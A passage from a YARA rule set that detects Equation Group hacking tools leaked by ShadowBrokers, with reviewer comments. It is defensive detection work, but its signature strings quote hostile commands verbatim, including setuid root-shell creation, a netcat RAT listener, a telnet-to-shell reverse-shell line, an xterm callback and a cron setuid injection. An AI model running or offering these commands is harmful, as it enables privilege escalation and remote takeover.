target IP [-c Cert File] [-k Key File]" fullword ascii $x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii $x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 100KB and 1 of them ) } rule EquationGroup_evolvingstrategy_1_0_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b" strings: $s1 = "chown root sh; chmod 4777 sh;" fullword ascii $s2 = "cp /bin/sh .;chown root sh;" fullword ascii $l1 = "echo clean up when elevated:" fullword ascii $x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii condition: ( filesize < 4KB and 1 of them ) } rule EquationGroup_toast_v3_2_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b" strings: $x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii $s5 = "Roasting ->%s<- at ->%d:%d<-" fullword ascii $s6 = "rbnoil -Roasting ->" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_sshobo { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45" strings: $x1 = "Requested forwarding of port %d but user is not root." 
fullword ascii $x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii $x3 = "~# - list forwarded connections" fullword ascii $x4 = "packet_inject_ignore: block" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 600KB and all of them ) } rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1" strings: $x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii $x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 80KB and 1 of them ) } rule EquationGroup_packrat { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file packrat" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf" strings: $x2 = "Use this on target to get your RAT:" fullword ascii $x3 = "$ratremotename && " fullword ascii $x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii condition: ( filesize < 70KB and 1 of them ) } rule EquationGroup_telex { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file telex" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef" strings: $x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii $x2 = "target is not vulnerable. exiting" fullword ascii $s3 = "Sending final buffer: evil_blocks and shellcode..." 
fullword ascii $s4 = "Timeout waiting for daemon to die. Exploit probably failed." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_calserver { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file calserver" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099" strings: $x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii $x2 = "Writing your %s to target." fullword ascii $x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_porkclient { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748" strings: $s1 = "-c COMMAND: shell command string" fullword ascii $s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii $s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_electricslide { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014" strings: $x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii $x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii $x3 = "Usage: eslide [options] <-t profile> <-l listenerip> 
<targetip>" fullword ascii $x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of them ) } rule EquationGroup_libXmexploit2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796" strings: $s1 = "Usage: ./exp command display_to_return_to" fullword ascii $s2 = "sizeof shellcode = %d" fullword ascii $s3 = "Execve failed!" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 1 of them ) } rule EquationGroup_wrap_telnet { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4" strings: $s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii $s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 4KB and 1 of them ) } rule EquationGroup_elgingamble { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd" strings: $x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii $x2 = "[-] kernel not vulnerable" fullword ascii $x3 = "[-] failed to spawn shell: %s" fullword ascii $x4 = "-s shell Use shell instead of %s" fullword ascii condition: 1 of them } rule EquationGroup_cmsd { meta: description = "Equation 
Group hack tool leaked by ShadowBrokers- file cmsd" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8" strings: $x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii $x2 = "error: not vulnerable" fullword ascii $s1 = "port=%d connected! " fullword ascii $s2 = "xxx.XXXXXX" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_ebbshave { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b" strings: $s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii $s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii $s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii $s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_eggbasket { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f" strings: $x1 = "# Building Shellcode into exploit." 
fullword ascii   // modifiers of $x1 of EquationGroup_eggbasket, whose rule header sits on the preceding line
        $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii
        $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
    condition:
        // ELF magic (bytes 7F 45 read as a little-endian uint16) plus any one string, or any two strings
        ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}

rule EquationGroup_jparsescan {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
    strings:
        // Usage banner of the Perl scan-output parser
        $s1 = "Usage: $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
        // A literal line of the script body
        $s2 = "$gotsunos = ($line =~ /program version netid address service owner/ );" fullword ascii
    condition:
        // Script target, so no magic-byte gate: the size bound plus either string is enough
        ( filesize < 40KB and 1 of them )
}

rule EquationGroup_sambal {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
    strings:
        // Console output of the Samba exploit. Gaps in the numbering ($s2, $s6) are strings the
        // rule generator discarded, not missing content.
        $s1 = "+ Bruteforce mode." fullword ascii
        $s3 = "+ Host is not running samba!" fullword ascii
        $s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
        $s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
        $s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}

rule EquationGroup_pclean_v2_1_1_2 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
    strings:
        $s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
        // Help text; the same line is used by the i386/x86_64 super rule later in this set
        $s6 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii
    condition:
        // Both strings are required, so the weak generic fragments do not fire on their own
        ( uint16(0) == 0x457f and filesize < 40KB and all of them )
}

rule EquationGroup_envisioncollision {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
    strings:
        // Perl source: the mysql/shell command templates it builds and what looks like an
        // admin hook-install URL (-Dipboard, do=install_hook) for a forum product
        $x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
        $x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
        $s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
        $s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
    condition:
        // "#!" shebang (bytes 23 21 as a little-endian uint16) gates the single-string branch
        ( uint16(0) == 0x2123 and filesize < 20KB and 1 of ($x*) ) or ( 2 of them )
}

rule EquationGroup_cmsex {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
    strings:
        // Usage and help text of the Solaris rpc.cmsd exploit. Trailing spaces in $x1/$x2 are
        // kept exactly as in the source rule; they matter under fullword.
        $x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
        $x2 = "-i target ip address / hostname " fullword ascii
        $x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
        $x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
        $x5 = "If one choice fails, you may want to try another." fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 50KB and 1 of ($x*) ) or ( 2 of them )
}

rule EquationGroup_exze {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
    strings:
        $s1 = "shellFile" fullword ascii
        // NOTE(review): "completed.1" looks like a compiler-emitted static symbol that many gcc-built
        // ELFs carry; it adds little on its own, but all three strings are required below
        $s2 = "completed.1" fullword ascii
        $s3 = "zeke_remove" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 80KB and all of them )
}

rule EquationGroup_porkserver {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file porkserver"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a"
    strings:
        // NOTE(review): these read like the log messages of a classic inetd; a second rule for the
        // same sample (EquationGroup_porkserver_v3_0_0) exists later in this set
        $s1 = "%s/%s server failing (looping), service terminated" fullword ascii
        $s2 = "getpwnam: %s: No such user" fullword ascii
        $s3 = "execv %s: %m" fullword ascii
        $s4 = "%s/%s: unknown service" fullword ascii
condition:
        // ELF, under 70KB, any three of the four inetd-style strings (porkserver's header and
        // strings are on the preceding line)
        ( uint16(0) == 0x457f and filesize < 70KB and 3 of them )
}

rule EquationGroup_DUL {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
    strings:
        // Usage line and status message of a shellcode encoder/wrapper
        $x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
        $x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
}

rule EquationGroup_slugger2 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
    strings:
        // Tool-specific usage text: the only strings that carry real signal
        $x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
        $x2 = "command must be less than 61 chars" fullword ascii
        // NOTE(review): the $s strings look like threading-library/compiler internals that any
        // statically linked ELF of the era may contain; the ELF branch therefore insists on an $x too
        $s1 = "__rw_read_waiting" fullword ascii
        $s2 = "completed.1" fullword ascii
        $s3 = "__mutexkind" fullword ascii
        $s4 = "__rw_pshared" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ($x*) ) ) or ( all of them )
}

rule EquationGroup_ebbisland {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
    strings:
        // NOTE(review): $x1 is a fairly generic usage line; the other five are distinctive
        $x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
        $x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
        $x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
        $x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
        $x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
        $x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
    condition:
        // No format gate: any single string in a file under 250KB
        filesize < 250KB and 1 of them
}

rule EquationGroup_jackpop {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
    strings:
        $x1 = "%x:%d --> %x:%d %d bytes" fullword ascii
        // Raw-socket client error messages
        $s1 = "client: can't bind to local address, are you root?" fullword ascii
        $s2 = "Unable to register port" fullword ascii
        $s3 = "Could not resolve destination" fullword ascii
        $s4 = "raw troubles" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
}

rule EquationGroup_parsescan {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
    strings:
        // A Perl line and the usage banner of the scan parser
        $s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
        $s2 = "Usage: $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_jscan {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
    strings:
        // Perl wrapper that shells out to a jscanner.jar
        $s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
        $s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_promptkill {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
    strings:
        // The /current/tmp/ path recurs across this tool set (see ftshell, ys, scanner) and is a
        // useful pivot on its own
        $x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
        $x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_epoxyresin_v1_0_0 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
    strings:
        // NOTE(review): "[-] kernel not vulnerable" is a common banner in Linux kernel exploit PoCs,
        // not specific to this tool; the ELF branch below fires on $x1 alone, so expect hits on
        // unrelated small PoC binaries and whitelist by hash where that matters
        $x1 = "[-] kernel not vulnerable" fullword ascii
        $s1 = ".tmp.%d.XXXXXX" fullword ascii
        $s2 = "[-] couldn't create temp file" fullword ascii
        $s3 = "/boot/System.map-%s" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
}

rule EquationGroup_estopmoonlit {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
    strings:
        $x1 = "[+] shellcode prepared, re-executing" fullword ascii
        $x2 = "[-] kernel not vulnerable: prctl" fullword ascii
        // NOTE(review): $x3 is generic exploit chatter and, with "1 of them" and no format gate,
        // is the likeliest source of false positives in this rule
        $x3 = "[-] shell failed" fullword ascii
        // Trailing space is part of the prompt text and is kept
        $x4 = "[!] selinux apparently enforcing. Continue [y|n]? " fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_envoytomato {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
    strings:
        // NOTE(review): both strings are generic exploit banners ($s1 is also used by
        // EquationGroup_epoxyresin_v1_0_0), and the condition needs only one of them in any file
        // under 250KB. This is the noisiest rule in the block; operators who see false positives
        // on public PoCs may prefer "all of them" or a hash allow-list rather than dropping the rule.
        $s1 = "[-] kernel not vulnerable" fullword ascii
        $s2 = "[-] failed to spawn shell" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_smash {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
    strings:
        // Argument syntax and error chatter of the tool (port 22 default suggests an SSH target)
        $x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
        $x2 = "no command given!! bailing..." fullword ascii
        $x3 = "no port. assuming 22..." fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_ratload {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
    strings:
        // Shell loader: temp-script path, the telnet-to-shell usage hint and the uncompress-and-run line
        $x1 = "/tmp/ratload.tmp.sh" fullword ascii
        $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
        $s6 = "uncompress -f ${NAME}.Z && PATH=. 
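${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
    condition:
        // Shell script, no magic gate: any single string in a file under 250KB
        // (ratload's header and the other strings are on the preceding line)
        filesize < 250KB and 1 of them
}

rule EquationGroup_ys {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
    strings:
        $x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
        // /current/etc/ is the same operator-environment root seen in ftshell, scanner and promptkill
        $x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
        $x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

rule EquationGroup_ewok {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
    strings:
        // Usage text of an SNMP-oriented tool (community string in the example); trailing space in $x3 kept
        $x1 = "Example: ewok -t target public" fullword ascii
        $x2 = "Usage: cleaner host community fake_prog" fullword ascii
        $x3 = "-g - Subset of -m that Green Spirit hits " fullword ascii
        $x4 = "--- ewok version" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 80KB and 1 of them )
}

rule EquationGroup_xspy {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
    strings:
        // NOTE(review): an X11 key sniffer named xspy with this usage line has been public for years;
        // this single string presumably matches the public build as well as the leaked one
        $s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
    condition:
        // "all of them" here is just $s1; the ELF gate and size bound do the rest
        ( uint16(0) == 0x457f and filesize < 60KB and all of them )
}

rule EquationGroup_estesfox {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
    strings:
        // Looks like a command-injection payload that drops a setuid binary via a
        // /tmp/logwatch.<pid>/cron path; distinctive enough to stand alone
        $x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
    condition:
        // No size or format gate in the source rule; kept as-is
        all of them
}

rule EquationGroup_elatedmonkey_1_0_1_1 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
    strings:
        // Usage line of the shell wrapper
        $x3 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
        // Embedded Python, PHP and bash fragments the script writes out. Numbering gaps are strings the
        // generator discarded; only these three $s strings exist.
        $s5 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
        $s13 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
        $s15 = "cat > /dev/tcp/127.0.0.1/80 <<END" fullword ascii
    condition:
        // FIX: the source rule required "5 of ($s*)" here, but only three $s strings remain after
        // pruning, so the shebang-gated branch could never be true (and newer YARA releases may
        // reject a quantifier larger than the set). Two of the three keeps the intended shape —
        // a looser, header-gated branch next to the ungated all-of branch, which is unchanged.
        ( uint16(0) == 0x2123 and filesize < 5KB and ( 1 of ($x*) and 2 of ($s*) ) ) or ( all of them )
}

rule EquationGroup_scanner {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
    strings:
        // NOTE(review): $x1 resembles the column header of Solaris rpcinfo output, so saved scan
        // output (not only the tool) may satisfy "1 of them"; validate on a corpus before alerting on it
        $x1 = "program version netid address service owner" fullword ascii
        $x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
        $x5 = "-scan winn %s one" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}

/* Super Rules ------------------------------------------------------------- */

rule EquationGroup__ftshell_ftshell_v3_10_3_0 {
    meta:
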